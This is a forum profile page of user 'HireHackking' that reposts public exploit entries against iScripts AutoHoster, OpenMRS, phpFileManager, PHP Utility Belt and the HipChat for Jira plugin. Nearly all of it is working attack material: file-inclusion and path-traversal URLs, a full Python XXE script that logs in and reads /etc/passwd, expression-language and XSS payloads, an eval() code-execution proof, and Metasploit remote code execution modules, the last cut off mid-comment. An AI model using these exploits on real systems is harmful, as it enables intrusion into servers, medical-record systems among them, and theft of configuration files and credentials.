
Everything posted by HireHackking
-
iScripts AutoHoster - 'id' Local File Inclusion

source: https://www.securityfocus.com/bid/64377/info

iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.

/support/admin/csvdownload.php

$filename="../csvfiles/".addslashes($_GET["id"]).".txt";
header('Content-Description: File Transfer');
header('Content-Type: application/force-download');
header('Content-Length: ' . filesize($filename));
header('Content-Disposition: attachment; filename=' . basename($filename));
readfile($filename);

[+] Exploit : /support/admin/csvdownload.php?id=../../includes/config.php%00
-
iScripts AutoHoster - 'fname' Local File Inclusion

source: https://www.securityfocus.com/bid/64377/info

iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.

/admin/downloadfile.php
> probably injected by the guy who nulled the script (thank u any way ;p)

$filename = urldecode($_GET['fname']);
header("content-disposition:attachment;filename=$filename");
readfile($filename);

no need to cancel anything, just beat it bro ;)

[+] Exploit : /admin/downloadfile.php?fname=../includes/config.php
-
iScripts AutoHoster - 'tmpid' Local File Inclusion

source: https://www.securityfocus.com/bid/64377/info

iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.

/websitebuilder/showtemplateimage.php

include_once "includes/session.php";
include_once "includes/function.php";

$templateid = $_GET['tmpid'];
$type = $_GET['type'];

if ($type == "home") {
    $imagename = "homepageimage.jpg";
} else if($type == "sub") {
    $imagename = "subpageimage.jpg";
} else {
    $imagename = "thumpnail.jpg";
}

readfile("./".$_SESSION["session_template_dir"]."/".$templateid."/$imagename");

Hmmm, we can cancel the imagename value via the null byte %00

[+] Exploit : /websitebuilder/showtemplateimage.php?tmpid=../../includes/config.php%00&type=sub
-
OpenMRS 2.3 (1.11.4) - XML External Entity Processing

#!/usr/bin/env python
#
# OpenMRS 2.3 (1.11.4) XML External Entity (XXE) Processing PoC Exploit
#
#
# Vendor: OpenMRS Inc.
# Product web page: http://www.openmrs.org
# Affected version: OpenMRS 2.3, 2.2, 2.1, 2.0 (Platform 1.11.4 (Build 6ebcaf), 1.11.2 and 1.10.0)
#                   OpenMRS-TB System (OpenMRS 1.9.7 (Build 60bd9b))
#
# Summary: OpenMRS is an application which enables design of a customized medical
# records system with no programming knowledge (although medical and systems analysis
# knowledge is required). It is a common framework upon which medical informatics
# efforts in developing countries can be built.
#
# Desc: The vulnerability is caused due to an error when parsing XML entities within
# ZIP archives and can be exploited to e.g. disclose data from local resources or cause
# a DoS condition (billion laughs) via a specially crafted XML file including external
# entity references.
#
#
# Tested on: Ubuntu 12.04.5 LTS
#            Apache Tomcat/7.0.26
#            Apache Tomcat/6.0.36
#            Apache Coyote/1.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2015-5289
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5289.php
#
# Affected: OpenMRS Core, Serialization.Xstream module, Metadata Sharing module
# Severity: Major
# Exploit: Remote Code Execution by an authenticated user
#
# Vendor Bug Fixes:
#
# Disabled serialization and deserialization of dynamic proxies
# Disabled deserialization of external entities in XML files
# Disabled spring's Expression Language support
#
# https://talk.openmrs.org/t/openmrs-security-advisories-2015-11-30/3868
# https://talk.openmrs.org/t/critical-security-advisory-2015-11-25/3824
# https://wiki.openmrs.org/display/RES/Release+Notes+2.3.1
# http://openmrs.org/2015/12/reference-application-2-3-1-released/
# https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.9.10
# https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.10.3
# https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.11.5
# https://modules.openmrs.org/modulus/api/releases/1308/download/serialization.xstream-0.2.10.omod
# https://modules.openmrs.org/modulus/api/releases/1309/download/metadatasharing-1.1.10.omod
# https://modules.openmrs.org/modulus/api/releases/1303/download/reporting-0.9.8.1.omod
#
# OpenMRS platform has been upgraded to version 1.11.5
# Reporting module has been upgraded to version 0.9.8.1
# Metadata sharing module has been upgraded to version 1.1.10
# Serialization.xstream module has been upgraded to version 0.2.10
#
# Who is affected?
#
# Anyone running OpenMRS Platform (1.9.0 and later)
# Anyone running OpenMRS Reference Application 2.0, 2.1, 2.2, 2.3
# Anyone that has installed the serialization.xstream module except for the newly released 0.2.10 version.
# Anyone that has installed the metadatasharing module except for the newly released 1.1.10 version.
#
#
# 02.11.2015
#

import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import time, datetime, re, zipfile, os
import binascii
from urllib2 import URLError

global bindata

piton = os.path.basename(sys.argv[0])

def bannerche():
    print '''
@-------------------------------------------------@
|                                                 |
|      OpenMRS 2.3 Authenticated XXE Exploit      |
|               ID: ZSL-2015-5289                 |
|       Copyleft (c) 2015, Zero Science Lab       |
|                                                 |
@-------------------------------------------------@
'''
    if len(sys.argv) < 4:
        print '\n[+] Usage: '+piton+' <host> <port> <path> \n'
        print '[+] Example: '+piton+' uat05.zeroscience.mk 8080 openmrs\n'
        sys.exit()

bannerche()

print '[+] Date: '+str(datetime.date.today())

payload = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ZSL [
<!ENTITY xxe1 SYSTEM "file:////etc/passwd" >
<!ENTITY xxe2 SYSTEM "file:///etc/resolv.conf" >
<!ENTITY xxe3 SYSTEM "file:///etc/issue" >]>
<package id="1" uuid="eecb64f8-35b0-412b-acda-3d83edf4ee63">
<dateCreated id="2">2015-11-06 10:47:19</dateCreated>
<name>&xxe1;</name>
<description>&xxe2;</description>
<openmrsVersion>&xxe3;</openmrsVersion>
<version>1</version>
</package>'''

print '[+] Creating header.xml file.'
file = open('header.xml', 'w')
file.write(payload)
file.close()
time.sleep(1)

print '[+] Packing evil XML file.'
with zipfile.ZipFile('xxe.zip', 'w') as devzip:
    devzip.write('header.xml')

os.remove('header.xml')
print '[+] XML file vacuumed.'
time.sleep(1)

filename = 'xxe.zip'
with open(filename, 'rb') as f:
    content = f.read()
    hexo = binascii.hexlify(content)
    bindata = binascii.unhexlify(hexo)

print '[+] File xxe.zip successfully created!'
print '[+] Initialising communication.'

host = sys.argv[1]
port = sys.argv[2]
path = sys.argv[3]

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

print '[+] Probing target http://'+host+':'+port+'/'+path+'/'

try:
    checkhost = opener.open('http://'+host+':'+port+'/'+path+'/login.htm')
    hostresp = checkhost.read()
except urllib2.HTTPError, errorzio:
    if errorzio.code == 404:
        print '[+] Error:'
        print '[+] Check your path entry!'
        print
        sys.exit()
except URLError, errorziocvaj:
    if errorziocvaj.reason:
        print '[+] Error:'
        print '[+] Check your hostname entry!'
        print
        sys.exit()

print '[+] Target seems OK.'
print '[+] Login please:'
print '''
Username:       Password:
doctor          Doctor123
nurse           Nurse123
clerk           Clerk123
sysadmin        Sysadmin123
admin           Admin123
scheduler       Scheduler123
'''

username = raw_input('[*] Enter username: ')
password = raw_input('[*] Enter password: ')

login_data = urllib.urlencode({
    'username' : username,
    'password' : password,
    'sessionLocation' : '3',
    'redirectUrl' : '/'+path+'/module/metadatasharing/import/list.form'
})

login = opener.open('http://'+host+':'+port+'/'+path+'/login.htm', login_data)
auth = login.read()

for session in cj:
    sessid = session.name

print '[+] Mapping session ID.'
ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)
print '[+] Cookie: '+cookie

if re.search(r'Invalid username/password. Please try again', auth):
    print '[+] Incorrect username or password.'
    print
    sys.exit()
else:
    print '[+] Authenticated!'

opener.open('http://'+host+':'+port+'/'+path+'/module/metadatasharing/import/list.form')
print '[+] Sending payload.'

class MultiPartForm(object):
    def __init__(self):
        self.form_fields = []
        self.files = []
        self.boundary = mimetools.choose_boundary()
        return

    def get_content_type(self):
        return 'multipart/form-data; boundary=%s' % self.boundary

    def add_field(self, name, value):
        self.form_fields.append((name, value))
        return

    def add_file(self, fieldname, filename, fileHandle, mimetype=None):
        body = fileHandle.read()
        if mimetype is None:
            mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
        self.files.append((fieldname, filename, mimetype, body))
        return

    def __str__(self):
        parts = []
        part_boundary = '--' + self.boundary

        parts.extend(
            [ part_boundary,
              'Content-Disposition: form-data; name="%s"' % name,
              '',
              value,
            ]
            for name, value in self.form_fields
        )

        parts.extend(
            [ part_boundary,
              'Content-Disposition: file; name="%s"; filename="%s"' % \
                 (field_name, filename),
              'Content-Type: %s' % content_type,
              '',
              body,
            ]
            for field_name, filename, content_type, body in self.files
        )

        flattened = list(itertools.chain(*parts))
        flattened.append('--' + self.boundary + '--')
        flattened.append('')
        return '\r\n'.join(flattened)

if __name__ == '__main__':
    form = MultiPartForm()
    form.add_field('file"; filename="xxe.zip', bindata)
    form.add_field('url', '')

    request = urllib2.Request('http://'+host+':'+port+'/'+path+'/module/metadatasharing/import/upload.form')
    request.add_header('User-agent', 'joxypoxy 6.5')
    body = str(form)
    request.add_header('Origin', 'http://'+host+':'+port)
    request.add_header('Accept-Encoding', 'gzip, deflate')
    request.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8')
    request.add_header('Accept-Language', 'en-US,en;q=0.8')
    request.add_header('Cache-Control', 'max-age=0')
    request.add_header('Upgrade-Insecure-Requests', '1')
    request.add_header('Referer', 'http://'+host+':'+port+'/'+path+'/module/metadatasharing/import/upload.form')
    request.add_header('Content-type', form.get_content_type())
    request.add_header('Cookie', cookie)
    request.add_header('Content-length', len(body))
    request.add_data(body)
    request.get_data()
    urllib2.urlopen(request).read()
    time.sleep(1)

    print '[+] Retrieving /etc/passwd:'
    time.sleep(2)
    getinfo = opener.open('http://'+host+':'+port+'/'+path+'/module/metadatasharing/import/validate.form')
    readinfo = getinfo.read()
    striphtml = re.sub("<.*?>", "", readinfo)
    match = re.search(r'root:.*/bin/bash', striphtml, re.DOTALL)
    print '\n--------------------------------------------------------'
    print match.group(0)
    print '--------------------------------------------------------'
    sys.exit()
-
phpFileManager 0.9.8 - Remote Code Execution (Metasploit)

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'phpFileManager 0.9.8 Remote Code Execution',
      'Description'    => %q{
        This module exploits a remote code execution vulnerability in phpFileManager 0.9.8
        which is a filesystem management tool on a single file.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'hyp3rlinx', # initial discovery
          'Jay Turla'  # msf
        ],
      'References'     =>
        [
          [ 'EDB', '37709' ],
          [ 'URL', 'http://phpfm.sourceforge.net/' ] # Official Website
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 2000,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Platform'       => %w{ unix win },
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['phpFileManager / Unix', { 'Platform' => 'unix' } ],
          ['phpFileManager / Windows', { 'Platform' => 'win' } ]
        ],
      'DisclosureDate' => 'Aug 28 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path of phpFileManager', '/phpFileManager-0.9.8/index.php']),
      ],self.class)
  end

  def check
    txt = Rex::Text.rand_text_alpha(8)
    res = http_send_command("echo #{txt}")
    if res && res.body =~ /#{txt}/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  def push
    uri = normalize_uri(target_uri.path)

    # To push the Enter button
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => uri,
      'vars_post' => {
        'frame' => '3',
        'pass'  => '' # yep this should be empty
      }
    })

    if res.nil?
      vprint_error("#{peer} - Connection timed out")
      fail_with(Failure::Unknown, "Failed to trigger the Enter button")
    end

    if res && res.headers && res.code == 302
      print_good("#{peer} - Logged in to the file manager")
      cookie = res.get_cookies
      cookie
    else
      fail_with(Failure::Unknown, "#{peer} - Error entering the file manager")
    end
  end

  def http_send_command(cmd)
    cookie = push
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path),
      'cookie'   => cookie,
      'vars_get' => {
        'action' => '6',
        'cmd'    => cmd
      }
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "Failed to execute the command.")
    end

    res
  end

  def exploit
    http_send_command(payload.encoded)
  end
end
-
OpenMRS 2.3 (1.11.4) - Expression Language Injection

OpenMRS 2.3 (1.11.4) Expression Language Injection Vulnerability

Vendor: OpenMRS Inc.
Product web page: http://www.openmrs.org
Affected version: OpenMRS 2.3, 2.2, 2.1, 2.0 (Platform 1.11.4 (Build 6ebcaf), 1.11.2 and 1.10.0)
                  OpenMRS-TB System (OpenMRS 1.9.7 (Build 60bd9b))

Summary: OpenMRS is an application which enables design of a customized medical records system with no programming knowledge (although medical and systems analysis knowledge is required). It is a common framework upon which medical informatics efforts in developing countries can be built.

Desc: Input passed via the 'personType' parameter is not properly sanitised in the spring's expression language support via 'addPerson.htm' script before being used. This can be exploited to inject expression language (EL) and subsequently execute arbitrary Java code.

Tested on: Ubuntu 12.04.5 LTS
           Apache Tomcat/7.0.26
           Apache Tomcat/6.0.36
           Apache Coyote/1.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2015-5288
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5288.php

Affected: OpenMRS Core, Serialization.Xstream module, Metadata Sharing module
Severity: Major
Exploit: Remote Code Execution by an authenticated user

Vendor Bug Fixes:

Disabled serialization and deserialization of dynamic proxies
Disabled deserialization of external entities in XML files
Disabled spring's Expression Language support

https://talk.openmrs.org/t/openmrs-security-advisories-2015-11-30/3868
https://talk.openmrs.org/t/critical-security-advisory-2015-11-25/3824
https://wiki.openmrs.org/display/RES/Release+Notes+2.3.1
http://openmrs.org/2015/12/reference-application-2-3-1-released/
https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.9.10
https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.10.3
https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.11.5
https://modules.openmrs.org/modulus/api/releases/1308/download/serialization.xstream-0.2.10.omod
https://modules.openmrs.org/modulus/api/releases/1309/download/metadatasharing-1.1.10.omod
https://modules.openmrs.org/modulus/api/releases/1303/download/reporting-0.9.8.1.omod

OpenMRS platform has been upgraded to version 1.11.5
Reporting module has been upgraded to version 0.9.8.1
Metadata sharing module has been upgraded to version 1.1.10
Serialization.xstream module has been upgraded to version 0.2.10

Who is affected?

Anyone running OpenMRS Platform (1.9.0 and later)
Anyone running OpenMRS Reference Application 2.0, 2.1, 2.2, 2.3
Anyone that has installed the serialization.xstream module except for the newly released 0.2.10 version.
Anyone that has installed the metadatasharing module except for the newly released 1.1.10 version.

02.11.2015

--

http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${3*3}&viewType=
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${applicationScope}&viewType=
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=%3Ci%3E${username}&viewType=
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${cookie[%22JSESSIONID%22].value}
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${Condition?%22Ok%22:3%3C2}
-
OpenMRS 2.3 (1.11.4) - Local File Disclosure

OpenMRS 2.3 (1.11.4) Local File Disclosure Vulnerability

Vendor: OpenMRS Inc.
Product web page: http://www.openmrs.org
Affected version: OpenMRS 2.3, 2.2, 2.1, 2.0 (Platform 1.11.4 (Build 6ebcaf), 1.11.2 and 1.10.0)
                  OpenMRS-TB System (OpenMRS 1.9.7 (Build 60bd9b))

Summary: OpenMRS is an application which enables design of a customized medical records system with no programming knowledge (although medical and systems analysis knowledge is required). It is a common framework upon which medical informatics efforts in developing countries can be built.

Desc: OpenMRS suffers from a file disclosure vulnerability when input passed through the 'url' parameter to viewPortlet.htm script is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks.

Tested on: Ubuntu 12.04.5 LTS
           Apache Tomcat/7.0.26
           Apache Tomcat/6.0.36
           Apache Coyote/1.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2015-5286
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5286.php
Vendor: https://talk.openmrs.org/t/openmrs-security-advisories-2015-11-30/3868

02.11.2015

--

http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm?id=reportDesignPortlet&url=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx%3d
http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm?id=reportProcessorPortlet&url=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx
http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm?id=reportDesignPortlet&url=..%2f..%2f..%2fMETA-INF%2fmaven%2forg.openmrs.web%2fopenmrs-webapp%2fpom.xml%3bx%3d
-
OpenMRS 2.3 (1.11.4) - Multiple Cross-Site Scripting Vulnerabilities

OpenMRS 2.3 (1.11.4) Multiple Cross-Site Scripting Vulnerabilities

Vendor: OpenMRS Inc.
Product web page: http://www.openmrs.org
Affected version: OpenMRS 2.3, 2.2, 2.1, 2.0 (Platform 1.11.4 (Build 6ebcaf), 1.11.2 and 1.10.0)
                  OpenMRS-TB System (OpenMRS 1.9.7 (Build 60bd9b))

Summary: OpenMRS is an application which enables design of a customized medical records system with no programming knowledge (although medical and systems analysis knowledge is required). It is a common framework upon which medical informatics efforts in developing countries can be built.

Desc: OpenMRS suffers from multiple stored and reflected cross-site scripting vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Tested on: Ubuntu 12.04.5 LTS
           Apache Tomcat/7.0.26
           Apache Tomcat/6.0.36
           Apache Coyote/1.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2015-5287
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5287.php
Vendor: https://talk.openmrs.org/t/openmrs-security-advisories-2015-11-30/3868

02.11.2015

--

PoC:

<html>
  <body>
    <form action="http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form" method="POST">
      <input type="hidden" name="parentUUID" value="71dde2c8-60be-4171-9d3d-71293cdc4142" />
      <input type="hidden" name="name" value=""><script>alert(1)</script>" />
      <input type="hidden" name="description" value=""><script>alert(2)</script>" />
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>

Other vulnerable scripts/parameters (GET/POST, Stored/Reflected)

Payload: <script>alert(1)</script>

http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [addName parameter]
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [personType parameter]
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [viewType parameter]
http://127.0.0.1:8080/openmrs/admin/users/users.list [Referer HTTP header]
http://127.0.0.1:8080/openmrs/admin/users/user.form [userId parameter]
http://127.0.0.1:8080/openmrs/options.form [defaultLocation parameter]
http://127.0.0.1:8080/openmrs/options.form [lang parameter]
http://127.0.0.1:8080/openmrs/options.form [newPassword parameter]
http://127.0.0.1:8080/openmrs/options.form [oldPassword parameter]
http://127.0.0.1:8080/openmrs/options.form [personName.familyName parameter]
http://127.0.0.1:8080/openmrs/options.form [personName.givenName parameter]
http://127.0.0.1:8080/openmrs/options.form [secretAnswerNew parameter]
http://127.0.0.1:8080/openmrs/options.form [secretQuestionPassword parameter]
http://127.0.0.1:8080/openmrs/options.form [username parameter]
http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [addUserAccount parameter]
http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [familyName parameter]
http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [gender parameter]
http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [givenName parameter]
http://127.0.0.1:8080/openmrs/adminui/systemadmin/accounts/account.page [username parameter]
http://127.0.0.1:8080/openmrs/htmlformentryui/htmlform/enterHtmlFormWithStandardUi.page [definitionUiResource parameter]
http://127.0.0.1:8080/openmrs/htmlformentryui/htmlform/enterHtmlFormWithStandardUi.page [returnUrl parameter]
http://127.0.0.1:8080/openmrs/login.htm [sessionLocation parameter]
http://127.0.0.1:8080/openmrs/referenceapplication/userApp.page [action parameter]
http://127.0.0.1:8080/openmrs/uicommons/messages/get.action [codes parameter]
http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [description parameter]
http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [name parameter]
http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [parameterName parameter]
http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [parentUUID parameter]
http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [reportId parameter]
http://127.0.0.1:8080/openmrs/admin/reports/reportMacros.form [macros parameter]
http://127.0.0.1:8080/openmrs/admin/reports/reportSchemaXml.form [reportSchemaId parameter]
http://127.0.0.1:8080/openmrs/admin/reports/reportSchemaXml.form [xml parameter]
http://127.0.0.1:8080/openmrs/admin/reports/runReport.form [schedule parameter]
http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Ben%5D.name parameter]
http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm [id parameter]
http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [cancelCallback parameter]
http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [label parameter]
http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [saveCallback parameter]
http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [valueType parameter]
http://127.0.0.1:8080/openmrs/module/metadatasharing/export/edit.form [type parameter]
http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [concept parameter]
http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [instructions parameter]
http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [orderType parameter]
http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [patient parameter]
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [addAge parameter]
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [personType parameter]
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [viewType parameter]
http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.form [description parameter]
http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.form [name parameter]
http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.form [taskClass parameter]
http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.list [taskId parameter]
http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Ben%5D.name parameter]
http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Ben_GB%5D.name parameter]
http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Bfr%5D.name parameter]
http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Bht%5D.name parameter]
http://127.0.0.1:8080/openmrs/dictionary/concept.form [synonymsByLocale%5Ben%5D%5B0%5D.name parameter]
http://127.0.0.1:8080/openmrs/module/logic/editRuleDefinition.form [description parameter]
http://127.0.0.1:8080/openmrs/module/logic/editRuleDefinition.form [name parameter]
http://127.0.0.1:8080/openmrs/module/logic/editRuleDefinition.form [ruleContent parameter]
http://127.0.0.1:8080/openmrs/module/logic/logic.form [patientId parameter]
http://127.0.0.1:8080/openmrs/patientDashboard.form [patientGraphConcept parameter]
-
PHP Utility Belt - Remote Code Execution

Exploit Title : PHP utility belt Remote Code Execution vulnerability
Author : WICS
Date : 8/12/2015
Software Link : https://github.com/mboynes/php-utility-belt

Overview:
PHP utility belt is a set of tools for PHP developers. Install in a browser-accessible directory and have at it.

ajax.php is accessible without any authentication.

Vulnerable code (line numbers 12 to 15):

if ( isset( $_POST['code'] ) ) {
    if ( false === eval( $_POST['code'] ) )
        echo 'PHP Error encountered, execution halted';
}

POC:

Access URL http://127.0.0.1/php-utility-belt/ajax.php and in the POST data type

code=fwrite(fopen('info.php','w'),'<?php echo phpinfo();?>');

The above code will generate an info.php file which will display the PHP info.

Shell link will be http://127.0.0.1/php-utility-belt/info.php
-
Atlassian HipChat for Jira Plugin - Velocity Template Injection (Metasploit)

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'json'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Atlassian HipChat for Jira Plugin Velocity Template Injection",
      'Description'    => %q{
        Atlassian Hipchat is a web service for internal instant messaging. A plugin is available
        for Jira that allows team collaboration at real time. A message can be used to inject Java
        code into a Velocity template, and gain code execution as Jira. Authentication is required
        to exploit this vulnerability, and you must make sure the account you're using isn't
        protected by captcha. By default, Java payload will be used because it is cross-platform,
        but you can also specify which native payload you want (Linux or Windows).

        HipChat for Jira plugin versions between 1.3.2 and 6.30.0 are affected. Jira versions
        between 6.3.5 and 6.4.10 are also affected by default, because they were bundled with a
        vulnerable copy of HipChat.

        When using the check command, if you supply a valid username and password, the module will
        be able to trigger the bug and check more accurately. If not, it falls back to passive, which
        can only tell if the target is running on a Jira version that is bundled with a vulnerable
        copy of Hipchat by default, which is less reliable.

        This vulnerability was originally discovered internally by Atlassian.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Chris Wood', # PoC
          'sinn3r'      # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2015-5603' ],
          [ 'EDB', '38551' ],
          [ 'BID', '76698' ],
          [ 'URL', 'https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html' ]
        ],
      'Targets'        =>
        [
          [ 'HipChat for Jira plugin on Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }],
          [ 'HipChat for Jira plugin on Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],
          [ 'HipChat for Jira plugin on Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]
        ],
      'DefaultOptions' =>
        {
          'RPORT' => 8080
        },
      'Privileged'     => false,
      'DisclosureDate' => 'Oct 28 2015',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        # Auth is required, but when we use the check command we allow them to be optional.
        OptString.new('JIRAUSER', [false, 'Jira Username', '']),
        OptString.new('JIRAPASS', [false, 'Jira Password', '']),
        OptString.new('TARGETURI', [true, 'The base to Jira', '/'])
      ], self.class)
  end

  # Returns a cookie in a hash, so you can ask for a specific parameter.
  #
  # @return [Hash]
  def get_cookie_as_hash(cookie)
    Hash[*cookie.scan(/\s?([^, ;]+?)=([^, ;]*?)[;,]/).flatten]
  end

  # Checks the target by actually triggering the bug.
  #
  # @return [Array] Exploit::CheckCode::Vulnerable if bug was triggered.
  #                 Exploit::CheckCode::Unknown if something failed.
  #                 Exploit::CheckCode::Safe for the rest.
  def do_explicit_check
    begin
      cookie = do_login

      # I don't really care which command to execute, as long as it's a valid one for both platforms.
      # If the command is valid, it should return {"message"=>"0"}.
      # If the command is not valid, it should return an empty hash.
      c = get_exec_code('whoami')
      res = inject_template(c, cookie)
      json = res.get_json_document
      if json['message'] && json['message'] == '0'
        return Exploit::CheckCode::Vulnerable
      end
    rescue Msf::Exploit::Failed => e
      vprint_error(e.message)
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Safe
  end

  # Returns the Jira version
  #
  # @return [String] Found Jira version
  # @return [NilClass] No Jira version found.
  def get_jira_version
    version = nil

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'secure', 'Dashboard.jspa')
    })

    unless res
      vprint_error('Connection timed out while retrieving the Jira version.')
      return version
    end

    metas = res.get_html_meta_elements
    version_element = metas.select { |m|
      m.attributes['name'] && m.attributes['name'].value == 'ajs-version-number'
    }.first

    unless version_element
      vprint_error('Unable to find the Jira version.')
      return version
    end

    version_element.attributes['content'] ? version_element.attributes['content'].value : nil
  end

  # Checks the target by looking at things like the Jira version, or whether the Jira web app
  # exists or not.
  #
  # @return [Array] Check code. If the Jira version matches the vulnerable range, it returns
  #                 Exploit::CheckCode::Appears. If we can only tell it runs on Jira, we return
  #                 Exploit::CheckCode::Detected, because it's possible to have Jira not bundled
  #                 with HipChat by default, but installed separately. For other scenarios, we
  #                 return Safe.
  def do_passive_check
    jira_version = get_jira_version
    vprint_status("Found Jira version: #{jira_version}")

    if jira_version && jira_version >= '6.3.5' && jira_version < '6.4.11'
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  # Checks the vulnerability. Username and password are required to be able to accurately verify
  # the vuln. If supplied, we will try the explicit check (which will trigger the bug, so should
